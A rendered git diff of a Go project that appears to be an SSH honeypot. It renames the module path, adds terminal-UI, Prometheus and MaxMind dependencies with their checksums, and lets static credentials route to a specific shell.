|
|
||||||
devShells = forAllSystems (system:
|
devShells = forAllSystems (system:
|
||||||
@@ -43,6 +68,7 @@
|
|||||||
pkgs.go
|
pkgs.go
|
||||||
pkgs.govulncheck
|
pkgs.govulncheck
|
||||||
pkgs.golangci-lint
|
pkgs.golangci-lint
|
||||||
|
pkgs.sqlite
|
||||||
];
|
];
|
||||||
};
|
};
|
||||||
});
|
});
|
||||||
|
|||||||
30
go.mod
30
go.mod
@@ -1,21 +1,49 @@
|
|||||||
module git.t-juice.club/torjus/oubliette
|
module code.t-juice.club/torjus/oubliette
|
||||||
|
|
||||||
go 1.25.5
|
go 1.25.5
|
||||||
|
|
||||||
require (
|
require (
|
||||||
github.com/BurntSushi/toml v1.6.0
|
github.com/BurntSushi/toml v1.6.0
|
||||||
|
github.com/charmbracelet/bubbletea v1.3.10
|
||||||
|
github.com/charmbracelet/lipgloss v1.1.0
|
||||||
github.com/google/uuid v1.6.0
|
github.com/google/uuid v1.6.0
|
||||||
|
github.com/oschwald/maxminddb-golang v1.13.1
|
||||||
|
github.com/prometheus/client_golang v1.23.2
|
||||||
|
github.com/prometheus/client_model v0.6.2
|
||||||
golang.org/x/crypto v0.48.0
|
golang.org/x/crypto v0.48.0
|
||||||
modernc.org/sqlite v1.45.0
|
modernc.org/sqlite v1.45.0
|
||||||
)
|
)
|
||||||
|
|
||||||
require (
|
require (
|
||||||
|
github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
|
||||||
|
github.com/beorn7/perks v1.0.1 // indirect
|
||||||
|
github.com/cespare/xxhash/v2 v2.3.0 // indirect
|
||||||
|
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
|
||||||
|
github.com/charmbracelet/x/ansi v0.10.1 // indirect
|
||||||
|
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd // indirect
|
||||||
|
github.com/charmbracelet/x/term v0.2.1 // indirect
|
||||||
github.com/dustin/go-humanize v1.0.1 // indirect
|
github.com/dustin/go-humanize v1.0.1 // indirect
|
||||||
|
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
|
||||||
|
github.com/kr/text v0.2.0 // indirect
|
||||||
|
github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
|
||||||
github.com/mattn/go-isatty v0.0.20 // indirect
|
github.com/mattn/go-isatty v0.0.20 // indirect
|
||||||
|
github.com/mattn/go-localereader v0.0.1 // indirect
|
||||||
|
github.com/mattn/go-runewidth v0.0.16 // indirect
|
||||||
|
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
|
||||||
|
github.com/muesli/cancelreader v0.2.2 // indirect
|
||||||
|
github.com/muesli/termenv v0.16.0 // indirect
|
||||||
|
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect
|
||||||
github.com/ncruces/go-strftime v1.0.0 // indirect
|
github.com/ncruces/go-strftime v1.0.0 // indirect
|
||||||
|
github.com/prometheus/common v0.66.1 // indirect
|
||||||
|
github.com/prometheus/procfs v0.16.1 // indirect
|
||||||
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
|
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
|
||||||
|
github.com/rivo/uniseg v0.4.7 // indirect
|
||||||
|
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
|
||||||
|
go.yaml.in/yaml/v2 v2.4.2 // indirect
|
||||||
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 // indirect
|
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 // indirect
|
||||||
golang.org/x/sys v0.41.0 // indirect
|
golang.org/x/sys v0.41.0 // indirect
|
||||||
|
golang.org/x/text v0.34.0 // indirect
|
||||||
|
google.golang.org/protobuf v1.36.8 // indirect
|
||||||
modernc.org/libc v1.67.6 // indirect
|
modernc.org/libc v1.67.6 // indirect
|
||||||
modernc.org/mathutil v1.7.1 // indirect
|
modernc.org/mathutil v1.7.1 // indirect
|
||||||
modernc.org/memory v1.11.0 // indirect
|
modernc.org/memory v1.11.0 // indirect
|
||||||
|
|||||||
94
go.sum
94
go.sum
@@ -1,34 +1,116 @@
|
|||||||
github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk=
|
github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk=
|
||||||
github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho=
|
github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho=
|
||||||
|
github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k=
|
||||||
|
github.com/aymanbagabas/go-osc52/v2 v2.0.1/go.mod h1:uYgXzlJ7ZpABp8OJ+exZzJJhRNQ2ASbcXHWsFqH8hp8=
|
||||||
|
github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
|
||||||
|
github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
|
||||||
|
github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
|
||||||
|
github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
|
||||||
|
github.com/charmbracelet/bubbletea v1.3.10 h1:otUDHWMMzQSB0Pkc87rm691KZ3SWa4KUlvF9nRvCICw=
|
||||||
|
github.com/charmbracelet/bubbletea v1.3.10/go.mod h1:ORQfo0fk8U+po9VaNvnV95UPWA1BitP1E0N6xJPlHr4=
|
||||||
|
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc h1:4pZI35227imm7yK2bGPcfpFEmuY1gc2YSTShr4iJBfs=
|
||||||
|
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc/go.mod h1:X4/0JoqgTIPSFcRA/P6INZzIuyqdFY5rm8tb41s9okk=
|
||||||
|
github.com/charmbracelet/lipgloss v1.1.0 h1:vYXsiLHVkK7fp74RkV7b2kq9+zDLoEU4MZoFqR/noCY=
|
||||||
|
github.com/charmbracelet/lipgloss v1.1.0/go.mod h1:/6Q8FR2o+kj8rz4Dq0zQc3vYf7X+B0binUUBwA0aL30=
|
||||||
|
github.com/charmbracelet/x/ansi v0.10.1 h1:rL3Koar5XvX0pHGfovN03f5cxLbCF2YvLeyz7D2jVDQ=
|
||||||
|
github.com/charmbracelet/x/ansi v0.10.1/go.mod h1:3RQDQ6lDnROptfpWuUVIUG64bD2g2BgntdxH0Ya5TeE=
|
||||||
|
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd h1:vy0GVL4jeHEwG5YOXDmi86oYw2yuYUGqz6a8sLwg0X8=
|
||||||
|
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd/go.mod h1:xe0nKWGd3eJgtqZRaN9RjMtK7xUYchjzPr7q6kcvCCs=
|
||||||
|
github.com/charmbracelet/x/term v0.2.1 h1:AQeHeLZ1OqSXhrAWpYUtZyX1T3zVxfpZuEQMIQaGIAQ=
|
||||||
|
github.com/charmbracelet/x/term v0.2.1/go.mod h1:oQ4enTYFV7QN4m0i9mzHrViD7TQKvNEEkHUMCmsxdUg=
|
||||||
|
github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
|
||||||
|
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
|
||||||
|
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||||
github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
|
github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
|
||||||
github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
|
github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
|
||||||
|
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4=
|
||||||
|
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f/go.mod h1:vw97MGsxSvLiUE2X8qFplwetxpGLQrlU1Q9AUEIzCaM=
|
||||||
|
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
|
||||||
|
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
|
||||||
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e h1:ijClszYn+mADRFY17kjQEVQ1XRhq2/JR1M3sGqeJoxs=
|
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e h1:ijClszYn+mADRFY17kjQEVQ1XRhq2/JR1M3sGqeJoxs=
|
||||||
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA=
|
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA=
|
||||||
github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
|
github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
|
||||||
github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||||
github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k=
|
github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k=
|
||||||
github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM=
|
github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM=
|
||||||
|
github.com/klauspost/compress v1.18.0 h1:c/Cqfb0r+Yi+JtIEq73FWXVkRonBlf0CRNYc8Zttxdo=
|
||||||
|
github.com/klauspost/compress v1.18.0/go.mod h1:2Pp+KzxcywXVXMr50+X0Q/Lsb43OQHYWRCY2AiWywWQ=
|
||||||
|
github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE=
|
||||||
|
github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk=
|
||||||
|
github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY=
|
||||||
|
github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
|
||||||
|
github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc=
|
||||||
|
github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw=
|
||||||
|
github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69Aj6K7nkY=
|
||||||
|
github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
|
||||||
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
|
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
|
||||||
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
||||||
|
github.com/mattn/go-localereader v0.0.1 h1:ygSAOl7ZXTx4RdPYinUpg6W99U8jWvWi9Ye2JC/oIi4=
|
||||||
|
github.com/mattn/go-localereader v0.0.1/go.mod h1:8fBrzywKY7BI3czFoHkuzRoWE9C+EiG4R1k4Cjx5p88=
|
||||||
|
github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
|
||||||
|
github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
|
||||||
|
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 h1:ZK8zHtRHOkbHy6Mmr5D264iyp3TiX5OmNcI5cIARiQI=
|
||||||
|
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6/go.mod h1:CJlz5H+gyd6CUWT45Oy4q24RdLyn7Md9Vj2/ldJBSIo=
|
||||||
|
github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELUXHmA=
|
||||||
|
github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo=
|
||||||
|
github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc=
|
||||||
|
github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk=
|
||||||
|
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=
|
||||||
|
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
|
||||||
github.com/ncruces/go-strftime v1.0.0 h1:HMFp8mLCTPp341M/ZnA4qaf7ZlsbTc+miZjCLOFAw7w=
|
github.com/ncruces/go-strftime v1.0.0 h1:HMFp8mLCTPp341M/ZnA4qaf7ZlsbTc+miZjCLOFAw7w=
|
||||||
github.com/ncruces/go-strftime v1.0.0/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls=
|
github.com/ncruces/go-strftime v1.0.0/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls=
|
||||||
|
github.com/oschwald/maxminddb-golang v1.13.1 h1:G3wwjdN9JmIK2o/ermkHM+98oX5fS+k5MbwsmL4MRQE=
|
||||||
|
github.com/oschwald/maxminddb-golang v1.13.1/go.mod h1:K4pgV9N/GcK694KSTmVSDTODk4IsCNThNdTmnaBZ/F8=
|
||||||
|
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
|
||||||
|
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
|
||||||
|
github.com/prometheus/client_golang v1.23.2 h1:Je96obch5RDVy3FDMndoUsjAhG5Edi49h0RJWRi/o0o=
|
||||||
|
github.com/prometheus/client_golang v1.23.2/go.mod h1:Tb1a6LWHB3/SPIzCoaDXI4I8UHKeFTEQ1YCr+0Gyqmg=
|
||||||
|
github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk=
|
||||||
|
github.com/prometheus/client_model v0.6.2/go.mod h1:y3m2F6Gdpfy6Ut/GBsUqTWZqCUvMVzSfMLjcu6wAwpE=
|
||||||
|
github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9ZoGs=
|
||||||
|
github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA=
|
||||||
|
github.com/prometheus/procfs v0.16.1 h1:hZ15bTNuirocR6u0JZ6BAHHmwS1p8B4P6MRqxtzMyRg=
|
||||||
|
github.com/prometheus/procfs v0.16.1/go.mod h1:teAbpZRB1iIAJYREa1LsoWUXykVXA1KlTmWl8x/U+Is=
|
||||||
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE=
|
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE=
|
||||||
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo=
|
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo=
|
||||||
|
github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
|
||||||
|
github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
|
||||||
|
github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
|
||||||
|
github.com/rogpeppe/go-internal v1.10.0 h1:TMyTOH3F/DB16zRVcYyreMH6GnZZrwQVAoYjRBZyWFQ=
|
||||||
|
github.com/rogpeppe/go-internal v1.10.0/go.mod h1:UQnix2H7Ngw/k4C5ijL5+65zddjncjaFoBhdsK/akog=
|
||||||
|
github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U=
|
||||||
|
github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U=
|
||||||
|
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
|
||||||
|
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
|
||||||
|
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
|
||||||
|
go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
|
||||||
|
go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI=
|
||||||
|
go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU=
|
||||||
golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
|
golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
|
||||||
golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
|
golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
|
||||||
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 h1:mgKeJMpvi0yx/sU5GsxQ7p6s2wtOnGAHZWCHUM4KGzY=
|
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 h1:mgKeJMpvi0yx/sU5GsxQ7p6s2wtOnGAHZWCHUM4KGzY=
|
||||||
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546/go.mod h1:j/pmGrbnkbPtQfxEe5D0VQhZC6qKbfKifgD0oM7sR70=
|
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546/go.mod h1:j/pmGrbnkbPtQfxEe5D0VQhZC6qKbfKifgD0oM7sR70=
|
||||||
golang.org/x/mod v0.29.0 h1:HV8lRxZC4l2cr3Zq1LvtOsi/ThTgWnUk/y64QSs8GwA=
|
golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c=
|
||||||
golang.org/x/mod v0.29.0/go.mod h1:NyhrlYXJ2H4eJiRy/WDBO6HMqZQ6q9nk4JzS3NuCK+w=
|
golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU=
|
||||||
golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
|
golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
|
||||||
golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
|
golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
|
||||||
|
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||||
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||||
golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
|
golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
|
||||||
golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
|
golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
|
||||||
golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
|
golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
|
||||||
golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
|
golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
|
||||||
golang.org/x/tools v0.38.0 h1:Hx2Xv8hISq8Lm16jvBZ2VQf+RLmbd7wVUsALibYI/IQ=
|
golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk=
|
||||||
golang.org/x/tools v0.38.0/go.mod h1:yEsQ/d/YK8cjh0L6rZlY8tgtlKiBNTL14pGDJPJpYQs=
|
golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA=
|
||||||
|
golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc=
|
||||||
|
golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg=
|
||||||
|
google.golang.org/protobuf v1.36.8 h1:xHScyCOEuuwZEc6UtSOvPbAT4zRh0xcNRYekJwfqyMc=
|
||||||
|
google.golang.org/protobuf v1.36.8/go.mod h1:fuxRtAxBytpl4zzqUh6/eyUujkJdNiuEkXntxiD/uRU=
|
||||||
|
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||||
|
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
|
||||||
|
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
|
||||||
|
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
|
||||||
|
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||||
modernc.org/cc/v4 v4.27.1 h1:9W30zRlYrefrDV2JE2O8VDtJ1yPGownxciz5rrbQZis=
|
modernc.org/cc/v4 v4.27.1 h1:9W30zRlYrefrDV2JE2O8VDtJ1yPGownxciz5rrbQZis=
|
||||||
modernc.org/cc/v4 v4.27.1/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0=
|
modernc.org/cc/v4 v4.27.1/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0=
|
||||||
modernc.org/ccgo/v4 v4.30.1 h1:4r4U1J6Fhj98NKfSjnPUN7Ze2c6MnAdL0hWw6+LrJpc=
|
modernc.org/ccgo/v4 v4.30.1 h1:4r4U1J6Fhj98NKfSjnPUN7Ze2c6MnAdL0hWw6+LrJpc=
|
||||||
|
|||||||
@@ -5,7 +5,7 @@ import (
|
|||||||
"sync"
|
"sync"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
)
|
)
|
||||||
|
|
||||||
const (
|
const (
|
||||||
@@ -21,6 +21,7 @@ type credKey struct {
|
|||||||
type Decision struct {
|
type Decision struct {
|
||||||
Accepted bool
|
Accepted bool
|
||||||
Reason string // "static_credential", "threshold_reached", "remembered_credential", "rejected"
|
Reason string // "static_credential", "threshold_reached", "remembered_credential", "rejected"
|
||||||
|
Shell string // optional: route to specific shell (only set for static credentials)
|
||||||
}
|
}
|
||||||
|
|
||||||
type Authenticator struct {
|
type Authenticator struct {
|
||||||
@@ -50,7 +51,7 @@ func (a *Authenticator) Authenticate(ip, username, password string) Decision {
|
|||||||
pMatch := subtle.ConstantTimeCompare([]byte(cred.Password), []byte(password))
|
pMatch := subtle.ConstantTimeCompare([]byte(cred.Password), []byte(password))
|
||||||
if uMatch == 1 && pMatch == 1 {
|
if uMatch == 1 && pMatch == 1 {
|
||||||
a.failCounts[ip] = 0
|
a.failCounts[ip] = 0
|
||||||
return Decision{Accepted: true, Reason: "static_credential"}
|
return Decision{Accepted: true, Reason: "static_credential", Shell: cred.Shell}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ import (
|
|||||||
"testing"
|
"testing"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
)
|
)
|
||||||
|
|
||||||
func newTestAuth(acceptAfter int, ttl time.Duration, statics ...config.Credential) *Authenticator {
|
func newTestAuth(acceptAfter int, ttl time.Duration, statics ...config.Credential) *Authenticator {
|
||||||
@@ -36,7 +36,7 @@ func TestStaticCredentialsWrongPassword(t *testing.T) {
|
|||||||
|
|
||||||
func TestRejectionBeforeThreshold(t *testing.T) {
|
func TestRejectionBeforeThreshold(t *testing.T) {
|
||||||
a := newTestAuth(3, time.Hour)
|
a := newTestAuth(3, time.Hour)
|
||||||
for i := 0; i < 2; i++ {
|
for i := range 2 {
|
||||||
d := a.Authenticate("1.2.3.4", "user", "pass")
|
d := a.Authenticate("1.2.3.4", "user", "pass")
|
||||||
if d.Accepted {
|
if d.Accepted {
|
||||||
t.Fatalf("attempt %d should be rejected", i+1)
|
t.Fatalf("attempt %d should be rejected", i+1)
|
||||||
@@ -49,7 +49,7 @@ func TestRejectionBeforeThreshold(t *testing.T) {
|
|||||||
|
|
||||||
